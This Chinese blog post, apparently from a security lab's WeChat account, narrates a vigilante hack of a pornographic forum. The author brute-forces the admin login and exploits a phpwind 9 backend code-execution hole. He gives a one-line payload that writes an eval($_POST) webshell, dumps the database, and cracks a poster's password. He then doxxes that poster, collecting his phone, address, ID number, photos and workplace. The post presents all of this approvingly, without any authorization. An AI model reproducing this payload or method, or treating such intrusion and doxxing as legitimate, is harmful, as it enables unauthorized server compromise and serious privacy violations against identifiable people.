本文作者:牛睾(SRC小组成员)
2020年1月10日心情也比较糟糕,QQ群一个群友举报一个论坛,经排查确定该论坛为色情论坛,为响应国家净网行动,坚决打击非法传播传播淫秽物品行为!
在踩点该网站的时候,甚至看到如下一篇帖子:
我心想,卧槽尼玛,还有这种操作还真是什么样的人都有哈,把脏东西搞到女孩子的汉堡里,然后再包起来放回去。再看着人家把汉堡完。。。。。
我决定用我毕生所学找到这个魔鬼。。。。不惜一切代价。。。。因为可以想象到,如果是我做火车,别人趁我睡着,给我的汉堡里加点料,是什么感觉。。。。
因为我不是会员,只能看到少量的图片,于是注册账号,发现这个论坛要邀请码才能注册会员,邀请码要100块一个,而我是一个屌丝,囊中羞涩,自然掏不出这个钱。
接着对该站进行信息收集,发现网站使用程序是phpwind V9.0.1的,还发现了后台登录地址。
这里可以看到,没有验证码,根据发帖记录可以知道管理员账号是admin,接下来就是爆破密码。用时5分钟,获取到管理员密码。尝试登录台。
此刻,隐约想起phpwind-9后台有一个命令执行漏洞,而且官方一直没修复。漏洞点位于门户->模块管理->调用管理->添加模块->自定义html。
在自定义html里输入<?phpphpinfo()?>,提交后,点击调用代码。
去掉xml,可以正常显示php信息,此时把phpinfo() 换成写shell文件代码
<?phpfputs(fopen("xxx.php","w"),"<?eval($_POST[xxx]);?>");?>,因为这台服务器没有waf,所以不用做处理接着菜刀连接。
顺手拖个库,可是这套系统不太熟,数据库备份完后,没找到下载点,也不想花太多时间折腾,直接写了一个拖库脚本。最终结果下。
涉事论坛地址就不放出来了,准备移交相关部门!
接下来就是要寻找发帖人ID“那个魔鬼"。。。。。
接着破解密码,很快得到密码,在网络中寻找这个ID,找到一篇关于他的帖子,内容如下。
这相貌堂堂,一表人才,做事却如此龌龊不堪,可我还有一丝怜悯之心,给你留下最后的尊严。。。言归正传。接下来继续寻找。
发现另外一个站点关于他的信息,这次找到的信息迎来了后续一系列信息,
看,找到了什么,居然是另外一个QQ和手机号,紧接着继续摸。
这次摸到了地址,到此,还没满足,接着摸。
这次摸到了毕业院校,再尝试看看能不能摸到SFZ信息。
运气还不错,不光得到了证件号码,还多加2张照片,再通过地址,找到了工作单位和电话。
到这里,已经可以确定他是在政府部门上班,而且有着大好未来,做事却如此不堪!
举头三尺有神灵,多行不义必自毙!!
好好学习,天天向上,远离黄赌毒!
本文始发于微信公众号(Ms08067安全实验室):“净网2020”打击网络色情,社工追踪变态色情狂
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论